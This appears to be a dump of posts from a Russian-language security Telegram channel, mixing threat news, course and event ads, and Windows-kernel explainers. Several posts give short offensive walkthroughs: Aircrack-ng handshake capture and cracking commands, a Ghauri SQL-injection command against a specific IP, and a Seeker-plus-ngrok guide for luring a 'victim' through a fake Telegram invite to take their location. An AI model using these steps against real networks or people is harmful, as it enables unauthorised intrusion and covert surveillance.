Исследователи из CloudSEK выявили тревожное обновление в деятельности ботнета Androxgh0st: с начала 2024 года он нацелен на веб-серверы и активно эксплуатирует уязвимости в известных технологиях, таких как Cisco ASA, Atlassian JIRA и различные PHP-фреймворки.

🗣️ Недавний отчет показал, что Androxgh0st теперь использует компоненты от ботнета Mozi, расширяя своё влияние на устройства интернета вещей (IoT) и возможное сотрудничество между двумя ботнетами.

Ключевые уязвимости, на которые нацелен Androxgh0st:

🔸 CVE-2017-9841 в PHPUnit, дающий бэкдор-доступ к вебсайтам
🔸 CVE-2018-15133 в Laravel, позволяющий выполнить зашифрованный код
🔸 CVE-2021-41773 в Apache, позволяющий атаки обхода путей

Mozi, ранее активно использовавший уязвимости в IoT-устройствах, таких как маршрутизаторы и DVR, был разгромлен в 2021 году. Однако Androxgh0st, судя по последним данным командных логов, внедрил Mozi-загрузки в свою инфраструктуру, что делает его ещё более опасным для IoT-среды.

#новости

Читать полностью…

🔥 Это всё меняет!

Positive Technologies 20 ноября запустит PT NGFW. Станьте частью этого масштабного события!

🤟 Два года компания разрабатывала высокопроизводительный и надежный межсетевой экран нового поколения.

Команда прислушивалась к мнению клиентов и партнеров, открыто рассказывала про внутреннюю кухню разработки. Смело бралась за сложные инженерные задачи, уделяла внимание не только коду, но и аппаратной платформе.

В результате они создали совершенное устройство, которое запустят 20 ноября!

👀 На онлайн-запуске вы сможете окунуться в историю создания продукта, узнать, как он защищает от киберугроз, результаты тестирования и завершенных проектов, а также планы на будущее.

Регистрируйтесь на онлайн-запуск заранее на сайте Positive Technologies.

Будем ждать каждого! 🤩

Читать полностью…

Расширение Hide YouTube Shorts для Chrome после смены владельца стало вредоносным. Вредоносный код был добавлен сразу после смены владельца. В результате чего, плагин начал заниматься мошенничеством с партнёрскими программами и отправлять псевдонимизированные данные пользователей на облачный сервер Amazon. Партнерское мошенничество направлено на генерацию прибыли, используя домен kra18[.]com, который заменяет ссылки на реферальные.

Список некоторых из затронутых популярных расширений:
⏺️Hide YouTube Shorts
⏺️Dynamics 365 Power Pane
⏺️Karma | Online shopping, but better
⏺️Visual Effects for Google Meet
⏺️M3U8 Downloader

Расширения стали вредоносными после передачи прав в середине 2023 года. Особое внимание вызывает расширение Karma.

👀 Вредоносный код в расширениях не был обфусцирован или замаскирован. Каждая часть кода по отдельности выглядит довольно безобидно, но в совокупности внедрённые функции приводят к нелегитимным воздействиям.

❓Зачем Karma Shopping нужны данные о пользователях?
Во-первых, партнёрские комиссии — это их основной вид деятельности и их целью является увеличение числа пользователей. Во-вторых, исходя из политики конфиденциальности компании, сбор данных о посещенных страницах является официальным и Karma утверждает, что продаёт эти данные третьим лицам, для более точного предоставления услуг пользователям.

⚙️ Несмотря на жалобы пользователей Google не реагирует.
Оповещение о проблеме происходит в формате заполнения формы, в которой причинами недовольства расширением служит «не соответствует ожиданиям» или «недружелюбное содержимое». Более точные и детализированные отзывы остаются без ответа.

#новости

Читать полностью…

🚨 Социальная инженерия и OSINT в VK: раскрытие методов и инструментов

В новой статье мы покажем два подхода, которые используют OSINT-специалисты для сбора информации в VK. На примере реального кейса разберём, как можно получить максимум данных, начиная с простого никнейма или фотографии.

✉️ Пассивный сбор данных: Узнаем, как найти профиль по никнейму, применяя Google Dork, Web Archive и полезные боты для анализа закрытых страниц. Покажем инструменты для поиска по фото, такие как FindClone и search4faces, чтобы отыскать людей даже с минимальными данными.

✏️ Активный сбор данных с помощью социальной инженерии: Расскажем, как можно использовать хитрые ссылки и инструменты, такие как StormBreaker, чтобы получить дополнительную информацию о цели.

➡️ Читать подробнее
➡️ Стать экспертом по OSINT
на обновленном курсе Академии здесь

Читать полностью…

Растет тенденция использования кибергруппировками в атаках сертификатов с расширенной проверкой (EV). Основные злоупотребления включают использование кодовых подписей для обхода мер безопасности, получения привилегий и создания доверия у пользователей. Злоумышленники могут приобретать EV-сертификаты на теневых рынках за $2000-6000. Получение сертификатов возможно через создание фиктивных компаний или кражу подписей у реальных организаций, как это произошло с NVIDIA, которые затем использовались в реальных атаках. Это позволяет им подписывать вредоносное ПО и распространять его под видом легитимного.

Злоумышленники используют купленные электронные подписи для:
🔸Обхода антивирусных проверок и повышения доверия к их программам.
🔸Получения административных привилегий в операционных системах.
🔸Публикации вредоносного кода, который выглядит как подписанный легитимным разработчиком, что снижает подозрения у пользователей и систем безопасности

Чтобы снизить риски специалисты Intrinsec рекомендуют:
🔸 Строгие правила белого и черного списков приложений.
🔸 Тщательная проверка валидности сертификатов.
🔸 Проверка отзыва сертификатов.
🔸 Использование репутационной аналитики для обнаружения вредоносных сертификатов.
🔸 Применение техники песочниц и изоляции для неизвестных исполняемых файлов

Для блокировки недоверенных сертификатов в Windows используются следующие механизмы:
🔸Контроль доступа к сертификатам через Certificate Trust Lists (CTL), которые позволяют доверять только определенным сертификатам или блокировать недоверенные.
🔸 Групповые политики: через Group Policy можно настроить блокировку исполняемых файлов, подписанных недоверенными сертификатами.
🔸 SmartScreen: технология, которая проверяет цифровые подписи приложений и блокирует их, если сертификаты недоверенные или отозваны.
🔸 AppLocker: позволяет настроить правила для запуска только тех приложений, которые подписаны доверенными сертификатами.

Читать полностью…

K2 Cloud + DevOops Conf = бесплатный день конференции для инженеров 💜

Ребята из K2 Cloud помогли организовать Community Day для DevOps-специалистов. 6 ноября ты сможешь бесплатно послушать часть докладов конференции DevOops: от основ работы сертификатов до организации Flux CD monorepo. Для участия нужно только зарегистрироваться.

Подробнее на сайте

Читать полностью…

Нет времени объяснять, регистрируйся на МТС True Tech Champ 🚀
Осталось несколько дней до шоу финала ИТ-чемпионата.

Дата: 8 ноября
Место: МТС Live Холл
Формат: Офлайн + Онлайн

Участников ждут:
🤖 Шоу с гонкой роботов в интерактивных лабиринтах
🕹 20+ активностей для кодеров и фанатов технологий
🧠 Выступления спикеров, воркшопы, плохие прогерские шутки

Тебе точно понравится, если ты:
— Занимаешься разработкой
— Интересуешься технологиями
— Планируешь построить карьеру в ИТ

До конца регистрации несколько дней — успей присоединиться: https://truetechchamp.ru/conf

Читать полностью…

Исследовательская группа Sysdig Threat Research Team (TRT) сообщает о глобальной атаке под кодовым названием Emeraldwhale, нацеленной на уязвимые Git-конфигурации. В результате этой операции злоумышленники похитили более 15,000 учетных данных для облачных сервисов, а также смогли клонировать более 10,000 приватных репозиториев.

⌛ Масштаб утечки
Украденные данные включают широкий спектр сервисов, от облачных провайдеров до почтовых платформ. Похищенные учетные данные активно используются в фишинговых и спам-кампаниях, а также продаются на подпольных рынках, где стоимость аккаунта может достигать сотен долларов.

⚙️ Инструменты и тактика атакующих
В ходе расследования Sysdig обнаружил, что злоумышленники использовали автоматизированные инструменты для поиска открытых Git-конфигураций и файлов .env, содержащих учетные данные. С помощью таких инструментов, как httpx и специализированных сканеров, Emeraldwhale смогли получать доступ к закрытым репозиториям и извлекать ключи для дальнейших атак.

🗣️ Атака Emeraldwhale показала, что одних мер по защите секретов недостаточно — критически важно отслеживать действия всех учетных записей с доступом к конфиденциальной информации. В противном случае утечка данных может стать точкой входа для широкомасштабных атак.

🛡 Как защититься?
🔸 Периодически проверяйте конфигурации веб-сервисов на предмет ошибок.
🔸 Используйте системы мониторинга активности учетных записей.
🔸 Обучите сотрудников основам безопасности для предотвращения ошибок, приводящих к утечкам данных.

#новости

Читать полностью…

Aircrack-ng👩‍💻

Aircrack-ng - это инструмент, который используется для безопасности и взлома Wi-Fi сетей. Это всё в одном - сниффер пакетов, взломщик WEP и WPA/WPA2, инструмент анализа и инструмент захвата хэшей. Он помогает захватывать пакеты и считывать из них хэши и даже взламывать эти хэши с помощью различных атак, таких как атаки по словарю.
Может работать в 4 режимах:
Режим монитора - Мониторит передачу пакетов и захватывает их, пока не поймает определённый файл с хэшем.
Режим атаки - Создаёт поддельные точки доступа и выполняет деаунтификацию.
Режим тестировки - Проверка вашей сетевой карты на совместимость и исправность, относительно работы программы.
Режим взлома - взламывет WEP или WPA PSK.

🔸Для вывода листа доступных сетевых интерфейсов, можно просто написать:

airmon-ng

🔸Можно остановить сетевой интерфейс:

airmon-ng stop <INTERFACE>

🔸И запустить на определённом канале:

airmon-ng start <INTERFACE> <CHANNEL>

🔸Давайте попробуем украсть аутентификационное рукопожатие)):

airodump-ng -c <CHANNEL> --bssid <BSSID> -w psk <INTERFACE>

🔸А далее можно подобрать пароль с помощью aircrack-ng:

aircrack-ng -w <PATH_T0_WORDLIST> <HANDSHAKE>

Читать полностью…

😎 Кодебай на Kuban CSC 2024. Как это было?

На прошлой неделе завершилась международная конференция по кибербезопасности Kuban CSC 2024, и мы рады поделиться с вами, как она прошла!
В этом году Кодебай выступал генеральным партнером мероприятия, поддерживая всё – от организации CTF-соревнований до открытия нашего фирменного стенда, где собрались сотни участников.

ℹ️ CTF-соревнования от Кодебай
Наши специалисты подготовили уникальную площадку для соревнований по практической информационной безопасности – KubanCTF-2024, в которой приняли участие команды студентов и школьников со всей России. На этой площадке в августе прошел отборочный этап, а в этом октябре более 20 команд сражались за призовые места!

🗣️ "Это была отличная возможность для молодых специалистов испытать свои силы и получить ценный опыт в решении реальных задач кибербезопасности." — Магомед-Эми, создатель CTF-заданий для KubanCTF 2024

🎉 Розыгрыш призов на стенде Кодебай
Наш стенд стал одним из самых популярных мест на конференции! Каждый мог поучаствовать в розыгрыше призов — от фирменного мерча до скидок на курсы Академии и годовой подписки на codeby.games. А случайно выбранный счастливчик выиграл главный приз — наушники AirPods Max. Поздравляем победителя и благодарим всех, кто присоединился к нашему розыгрышу!

🗣️ "Мы — те самые ребята, которые взламывают ваши компании и дают рекомендации как закрыть уязвимости." — Сергей Попов, генеральный директор и основатель "Кодебай"


💯 Кодебай — лидер в области образования в кибербезопасности
Мы гордимся тем, что можем делиться опытом и знаниями с молодыми специалистами и профессионалами отрасли. Наше сообщество охватывает все направления информационной безопасности, помогая каждому открыть для себя мир кибербезопасности. KubanCSC – это большой шаг вперед в развитии отечественных специалистов, и мы благодарны всем, кто стал частью этого важного события.

Спасибо, что были с нами на этом значимом мероприятии! До новых встреч!

Читать полностью…

✔️ Вышла новая статья рубрики "Без про-v-ода"!

Сегодня мы тестируем три популярных прошивки для платы ESP8266: ESP8266-EvilTwin, ESP8266-Captive-Portal и PhiSiFi. Если вы уже пробовали deauther, пришло время познакомиться с другими прошивками, каждая из которых предлагает уникальные возможности.

⚙️ PhiSiFi объединяет функционал Evil-Twin и Captive-Portal, создавая поддельные точки доступа для захвата паролей и отключения пользователей от сети. Простой интерфейс и удобный Captive Portal делают её идеальной для тестирования беспроводной безопасности.

📎 EvilTwin и Captive-Portal тоже отлично работают, но уступают по функционалу и удобству. EvilTwin предлагает самописный интерфейс для создания фейковых точек доступа, а Captive-Portal больше подходит для развлечения и демонстрации захвата данных.

✔️ Читать подробнее

Читать полностью…

🎯Как защититься от сложных и целевых атак с учетом дефицита высококлассных кадров? Усильте ИБ-отдел мощным союзником.

Только представьте - умная и современная защита станет вашей страховкой в тот самый момент, когда сыграет человеческий фактор. Платформа Kaspersky Anti Targeted Attack совместно с Kaspersky EDR Expert представляет собой решение класса XDR нативного типа.

Для вас это означает:

- Автоматический сбор и хранение данных
- Всесторонний анализ и своевременное обнаружение
- Расширенные возможности защиты от сложнейших угроз
- Но лучше 1 раз увидеть, чем 100 раз услышать, верно?

👌 Запишитесь на бесплатную демонстрацию и оцените, как легко можно усилить вашу защиту без привлечения дополнительных ресурсов и специалистов

Реклама. ООО "КРАЙОН". ИНН 9717087315. erid: LjN8JsutK

Читать полностью…

🔔 Вторая часть серии статей о ядре Windows посвящена исследованию подсистемы Win32 и драйвера поддержки win32k.sys, рассматриваются переходы из пользовательского режима в режим ядра через таблицу системных сервисов SSDT.

🗣️ Статья включает практические примеры в отладчике WinDbg, так что знания можно сразу применить на практике. Рекомендуется к прочтению после первой части.

Подсистема Win32 в архитектуре Windows
🔸В Windows виртуальная память делится на область пользователя (User) и ядра (Kernel). На системах x64 используется только часть адресного пространства. Старшие 16 бит установлены в единицу, что позволяет по старшим битам адреса сразу определять, принадлежит ли объект ядру или пользователю.
🔸Win32, основная подсистема Windows, предоставляет базовые библиотеки окружения, такие как Kernel32, User32 и Gdi32, отвечающие за интерфейсы графики (GUI). Отдельное внимание уделено драйверу win32k.sys, который поддерживает работу графического интерфейса в ядре.

Файлы Csrss.exe, Gdi32.dll и Win32k.sys
🔸GDI (Graphics Device Interface) — это компонент для вывода графического контента на устройства. До NT4 он находился в пользовательском режиме, но в целях безопасности его перенесли в режим ядра, добавив win32k.sys. Теперь CSRSS (Client/Server Runtime SubSystem) обрабатывает только консольные задачи, а графика передана win32k.sys.

SSDT — System Service Descriptor Table
🔸SSDT позволяет выполнять системные вызовы в ядре с использованием SYSENTER/SYSCALL инструкций. Для каждой функции ядра есть уникальный "System Service Number" (SSN), который задает ее адрес в SSDT. Это обеспечивает быстрый и эффективный переход между режимами.
🔸Для графических функций существует отдельная "затененная" таблица — SSDT Shadow. Она действует только для GUI-приложений, тогда как консольные приложения используют основную таблицу SSDT#0.

⚙️ В статье приводится демонстрация работы SSDT и SSDT Shadow в отладчике WinDbg. Указатели на обе таблицы можно обнаружить, подключившись к процессу GUI.

➡️ Читать подробнее

Читать полностью…

В первой статье нового цикла копнем глубже в архитектуру ядра Windows и обсудим такие интересные сущности, как объекты и дескрипторы. Пройдемся по основным структурам — от EPROCESS, которая "идентифицирует" процесс, до TABLE_ENTRY, которая хранит дескрипторы. И да, это та самая база, на которой строятся античиты и антивирусы.

⚙️ Процессы и Потоки
Создание процесса начинается с вызова Kernel32!CreateProcess(), который через цепочку Ntdll → ядро попадает в Nt/ZwCreateFile(). Здесь создается основная структура процесса _EPROCESS, включающая ядро планировщика _KPROCESS. Каждый поток получает свою структуру _ETHREAD, связанную с _EPROCESS. Процессы идентифицируются по PID, а потоки по TID, что помогает ОС отслеживать и управлять их состоянием.

⚙️ Object, Handle и Identifier
В глазах ядра всё является *объектом* — от файлов до процессов. Каждый объект имеет дескриптор (handle), который предоставляет к нему доступ. Когда, например, открывается файл через CreateFile(), ядро создает объект и возвращает handle, по которому процесс может обращаться к объекту. Управление и подсчет ссылок на объекты происходит через два счетчика: Handle и Pointer, которые отслеживаются диспетчером объектов.

⚙️ Исследование объектов
На физическом уровне объект — это структура данных с заголовком OBJECT_HEADER. У него есть поле SecurityDescriptor, хранящее доступ к объекту (DACL/ACE). Обычно драйверы и API возвращают только тело объекта (смещение 30h), скрывая доступ к заголовку. Но, имея адрес объекта, можно получить и доступ к заголовку, что важно при анализе системной безопасности.

⚙️ Таблица Дескрипторов Процесса
Каждому процессу выделяется своя таблица дескрипторов HANDLE_TABLE. Это ускоряет доступ к дескрипторам и управляется системой автоматически, выделяя виртуальные страницы памяти. Размер одной записи — 16 байт, из которых первые 8 — это указатель на OBJECT_HEADER, а вторые — маска доступа GrantedAccess.

✏️ Продолжение следует: в следующей части обсудим больше интересных деталей системы, так что следите за обновлениями!

➡️ Читать подробнее

Читать полностью…

🚩 Новые задания на платформе Codeby Games!

🔑 Категория Криптография — Загадка

🎢 Категория Разное — Фрилансер

Приятного хакинга!

Читать полностью…

🤖 PentestGPT - это инструмент тестирования на проникновение, предоставляемый ChatGPT. Он предназначен для автоматизации процесса тестирования на проникновение. Он построен на основе ChatGPT и работает в интерактивном режиме. Данная утилита способна самостоятельно решать легкие и средние машины на HTB

🔸 Установка утилиты

pip3 install git+https://github.com/GreyDGL/PentestGPT

🔸 Импорт ключа
Для корректной работы нам понадобится ключ для доступа к API OpenAI

shell export OPENAI_API_KEY='<your key here>'

🔸 Проверка работоспособности

pentestgpt-connection

🔸 Запуск утилиты

pentestgpt --reasoning_model=gpt-4-turbo

После всех проделанных шагов вы можете начать общение с дообученым помощником, который может самостоятельно проводить базовые проверки

Читать полностью…

🔄 💻 Ghauri v1.3.8

🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.

Поддерживаемые техники:

Boolean based
Error Based
Time Based
Stacked Queries

Поддерживаемые СУБД:

MySQL
Microsoft SQL Server
Postgres
Oracle

Поддерживаемые типы:

GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML

Добавлена поддержка:

--sql-shell
--proxy

⚙️ Установка и запуск:

git clone https://github.com/r0oth3x49/ghauri.git

python3 -m pip install --upgrade -r requirements.txt

python3 setup.py install

ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs

Читать полностью…

Уважаемые клиенты, ввиду блокировки Cloudflare часть наших сайтов временно недоступна без VPN. В том числе и codeby.school. Наши инженеры в курсе проблемы и обещают ее решить в течение часа.

Читать полностью…

😎 Напоминаем, на каких курсах начинается обучение в ноябре:

🌟 6 ноября: Курс «Введение в Реверс инжиниринг» (Запись до 16 ноября)
🌟 7 ноября: Курс «Боевой OSINT»
🌟 11 ноября: Курс «Основы Linux»
🌟 25 ноября: Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)»

✔️ Запись на курс «Специалист центра мониторинга инцидентов информационной безопасности (SOC)» продлится до 7 ноября!

Внимание! До конца ноября у вас есть возможность купить курсы декабря по старым ценам*:
🔸2 декабря: Курс «Тестирование Веб-Приложений на проникновение (WAPT)»
🔸16 декабря: Курс «Анализ защищенности инфраструктуры на основе технологий Active Directory»

*С декабря стоимость курсов увеличится на 10%

🔔 Запишитесь у нашего менеджера @Codeby_Academy 🚀 или узнайте подробности на сайте!

Читать полностью…

Исследователи кибербезопасности обнаружили новую волну атак, в которых злоумышленники эксплуатируют API DocuSign для отправки поддельных счетов. В отличие от традиционного фишинга, здесь преступники создают подлинные аккаунты и используют шаблоны DocuSign, чтобы выдавать себя за известные бренды и обходить защитные фильтры 💱

👀 Новый уровень фишинга
Вместо поддельных писем с вредоносными ссылками, эти атаки используют реальные сервисы для создания доверия.

🗣️ К примеру, как сообщает Wallarm, киберпреступники открывают платные аккаунты DocuSign и настраивают шаблоны для имитации счетов от компаний, таких как Norton Antivirus.

Злоумышленники отправляют такие счета напрямую через DocuSign, и они проходят проверку как подлинные, так как исходят с легитимного сервиса, не содержащего явных вредоносных ссылок.

✏️ Чтобы снизить риски, специалисты Wallarm рекомендуют:
🔸 Проверять отправителя и внимательно смотреть на подозрительные письма.
🔸 Вводить многоступенчатое подтверждение финансовых операций.
🔸 Обучать сотрудников распознавать поддельные счета.
🔸 Мониторить любые неожиданные транзакции.

Сторонние сервисы также должны применять ограничение на количество запросов к API и отслеживать аномалии в активности API.

🟢 API уязвимости
За последние месяцы пользователи DocuSign массово жалуются на мошеннические счета, указывая на высокую автоматизацию таких атак. Злоумышленники используют API DocuSign, чтобы отправлять поддельные счета в большом объеме. Wallarm предупреждает: удобство API дизайна — это и потенциальная лазейка для злоумышленников.

#новости

Читать полностью…

Seeker

Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.

Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".

🔸 Установка утилиты

git clone https://github.com/thewhiteh4t/seeker

🔸 Запуск

cd seeker/
python3 seeker.py

Далее заполняем шаблон и подкручиваем клиент, можно использовать ngrok, но будьте аккуратны,

ngrok строго относится к тому, что на нём запускают.

🔸 Установка ngrok

Скачиваем архив и командой разорхивируем его: sudo tar -xvzf ~/Downloads/ngrok.tgz -C /usr/local/bin

🔸 Далее создаём аккаунт и регистрируем автотокен, его можно найти у себя на аккаунте

ngrok config add-authtoken <token>

Отлично! Теперь командой ниже, запускаем клиент и можно отправлять ссылку любому человеку.

ngrok http 8080

Читать полностью…

🚩 Новые задания на платформе Codeby Games!

🖼 Категория Стеганография — Тайна пикселей

🏆  Категория Квесты — Симпсоны

Приятного хакинга!

Читать полностью…

Новый CTF-марафон от «Доктор Веб»!

Уже второй год подряд компания организует CTF-марафон для студентов и молодых IT-специалистов.
CTF-марафон пройдет в онлайне с 00:00 воскресенья 3 ноября и до 23:59 субботы 16 ноября 2024 года. Регистрация уже открыта по ссылке ✅

Победителей ждут ценные призы, а главной наградой за успешное взятие флагов может стать должность вирусного аналитика в компании «Доктор Веб» и возможность решать уже не игровые, а боевые задачи в команде антивирусной лаборатории Dr.Web.

Вас ждут 16 заданий, связанных с реверс-инжинирингом и анализом файлов, если вы готовы к непростым, но увлекательным задачам — регистрируйтесь, и пусть победит сильнейший!

Читать полностью…

29 октября Apple выпустила критическое обновление безопасности для 90 своих сервисов и операционных систем, включая macOS, iOS, iPadOS, watchOS, tvOS и visionOS. Обновления также коснулись Safari и iTunes. Это обновление устраняет множество уязвимостей, которые могли поставить под угрозу конфиденциальность и безопасность пользователей.

Что нового?
🔸 macOS: Исправлены уязвимости, которые позволяли злоумышленникам получить доступ к контактам, конфиденциальным данным геолокации через сервис Find My и утечкам критических данных ядра. Некоторые из них также устраняли возможность атаки отказа в обслуживании (DoS) при открытии вредоносных изображений.
🔸 Safari: Закрыты дыры, позволявшие утечку истории просмотров в режиме Private Browsing.
🔸 iOS и iPadOS: Устранены баги, которые позволяли просматривать личные данные, даже если устройство заблокировано. Среди уязвимостей — проблема с Siri, из-за которой можно было просматривать фотографии контактов.
🔸 visionOS 2.1: Обновление включает исправления более чем 25 уязвимостей, некоторые из которых позволяли выполнение произвольного кода, доступ к конфиденциальной информации и даже полный сбой системы.

🗣️ Apple подчеркивает, что своевременное обновление ПО — это ключ к защите устройств и данных. Исследователи из таких компаний, как Trend Micro, CrowdStrike, Alibaba и JD.com, внесли значительный вклад в обнаружение и устранение этих уязвимостей.

#новости

Читать полностью…

Прими участие в «Хакатоне по кибериммунной разработке 3.0» от «Лаборатории Касперского» с призовым фондом 1 000 000 рублей!

Регистрация на хакатон открыта до 15 ноября

Приглашаем разработчиков, аналитиков, архитекторов ПО, экспертов по информационной безопасности и студентов программирования и кибербезопасности. Участвуй индивидуально или в команде до 5 человек.

Тебе предстоит разработать систему удалённого управления автомобилем для каршеринга, устойчивую к кибератакам. Специальных знаний в автомобильной отрасли не требуется — задача будет понятна всем, независимо от опыта.

Это твой шанс прокачать навыки в кибербезопасности и пообщаться с экспертами «Лаборатории Касперского».

Ключевые даты:
• 15 октября – 15 ноября – регистрация участников
• 8 ноября – митап с экспертами и игра «Огнеборец»
• 15 ноября – старт хакатона
• 17 ноября – дедлайн загрузки решений
• 22 ноября – подведение итогов и объявление победителей

Регистрируйся, прояви себя и внеси вклад в безопасность каршеринговых сервисов

Читать полностью…

В третьей статье цикла обсудим архитектуру объектов USER и GDI, которые отвечают за графику и интерфейс Windows. Например, объект типа *Window* включает почти все элементы окна — кнопки, поля ввода, списки и чекбоксы, а GDI добавляет обрамление, фигуры, цвет и шрифты.

⚙️Память и пулы Windows

Вся физическая память распределяется через системный диспетчер. Он выделяет большие объёмы через VirtualAlloc() и мелкие через HeapAlloc(), которые на уровне ядра обращаются к NtAllocateVirtualMemory() и RtlAllocateHeap().

Память делится на Paged Pool (может выгружаться на диск) и NonPaged Pool (всегда в ОЗУ). При старте создаётся несколько базовых пула для каждого пользователя в своей сессии, а также для всех системных служб. Это помогает системно управлять памятью и разграничивать процессы.

⚙️USER и GDI: Память и объектная таблица

🔸 USER-объекты (интерфейсные элементы) хранятся в куче рабочего стола.
🔸 GDI-объекты (графические примитивы) получают память из NonPagedSessionPool.

Объекты GDI привязаны к контексту создающего их процесса. Например, передача кисти из одного процесса в другой с высокой вероятностью может привести к сбоям.

Дескрипторы объектов управляются глобальной таблицей в каждой сессии и индексируются в фиксированной таблице с лимитом в 65,536 объектов. Например, GDIProcessHandleQuota в реестре ограничивает доступный для процесса лимит (по умолчанию — 10,000 дескрипторов).

⚙️Объекты USER

USER-объекты индексируются в таблице дескрипторов каждой сессии, которая отображается в пользовательском пространстве каждого GUI-процесса. Указатель на таблицу USER хранится в win32k!gSharedInfo, и её записи отображаются через массив HANDLEENTRY, предоставляя быстрый доступ процессам без необходимости в вызовах ядра.

🗣️ GDI и USER объекты — основа графической подсистемы Windows, которая позволяет управлять интерфейсом и графикой на уровне ядра.

➡️ Читать подробнее

Читать полностью…

Согласно новому отчёту Email Threat Trends Report от Vipre Security Group, мошеннические атаки с использованием деловой переписки (BEC) составляют более половины всех фишинговых попыток, и производственные компании оказались особенно уязвимыми.

Основные данные отчёта
🔸 Из 1,8 миллиарда обработанных за квартал писем, 12% были классифицированы как вредоносные, а на BEC пришлось 58% всех фишинговых атак.
🔸 В 89% случаев атакующие выдавали себя за авторитетных лиц, чтобы вызвать доверие.
🔸 Производственный сектор оказался наиболее подверженным угрозам: 27% всех обработанных писем в этой отрасли оказались вредоносными.

⚙️ Рост атак на производственный сектор
На производственные компании стали чаще нацеливаться из-за возможности перенаправления платежей поставщиков на мошеннические счета. Кроме того, взлом корпоративных почтовых ящиков даёт доступ к другим компаниям и клиентам, позволяя отправлять поддельные запросы на документы для кражи учетных данных.

❓ Почему риск возрастает?
Многие сотрудники в секторе производства используют мобильные устройства для входа на рабочие площадки, что повышает вероятность попадания на фишинговые ссылки в условиях высокой занятости и стремления к соблюдению сроков.

🛡 ИИ в службе BEC-мошенничества
Отчёт отмечает, что 36% фишинговых писем с использованием BEC были созданы генеративным ИИ, что делает их более сложными для выявления. Злоумышленники также часто используют вложения и URL-перенаправления для обхода систем безопасности.

#новости #фишинг

Читать полностью…

Известная группа Lazarus, включая её подразделение BlueNoroff, провела очередную сложную кибератаку, эксплуатируя новую уязвимость нулевого дня в Google Chrome 👀

🔍 Исследователи Kaspersky обнаружили эту кампанию, когда вредоносное ПО Manuscrypt, используемое Lazarus, инфицировало систему в России. В этот раз группа использовала уязвимость в движке V8 Chrome, позволяющую получить полный контроль над заражёнными устройствами.

🗣️ Атака началась с сайта detankzone[.]com, который притворялся платформой DeFi-игры с NFT. Достаточно было посетить сайт через Chrome, чтобы сработала вредоносная программа, перехватывающая управление системой.

Ключевые уязвимости:
🔸 CVE-2024-4947: Переписывание критических структур памяти в компиляторе Maglev Chrome
🔸 Обход песочницы V8: Позволил выполнить произвольный код

#новости

Читать полностью…

Согласно исследованию ISACA на Европейской конференции 2024 года, специалисты по кибербезопасности всё чаще остаются в стороне при разработке политик по использованию ИИ.

✏️ Только 35% из опрошенных 1800 специалистов участвуют в создании таких политик, а 45% вовсе не задействованы в разработке, внедрении или управлении ИИ-решениями.

💡 Несмотря на растущее число компаний, разрешающих генеративный ИИ на рабочем месте, кибербезопасность не всегда интегрируется в новые AI-стратегии, о чем заявил Крис Димитриадис, Chief Global Strategy Officer ISACA.

🗣️ "Мы стремимся к инновациям и улучшению клиентского опыта, фокусируясь на этике и комплаенсе, забывая про кибербезопасность, которая жизненно необходима", — подчеркнул Димитриадис.

👀 По словам генерального директора ISACA, Эрика Пруша, управление рисками ИИ теперь лежит не только на CISO или CIO, а на всей команде, так как уязвимости зависят от каждого человека в организации.

Где уже применяется ИИ:
🔸 Автоматизация обнаружения и реагирования на угрозы (28%)
🔸 Безопасность конечных точек (27%)
🔸 Рутинные задачи (24%)
🔸 Обнаружение мошенничества (13%)

#новости

Читать полностью…

Под надежной охраной :)

Читать полностью…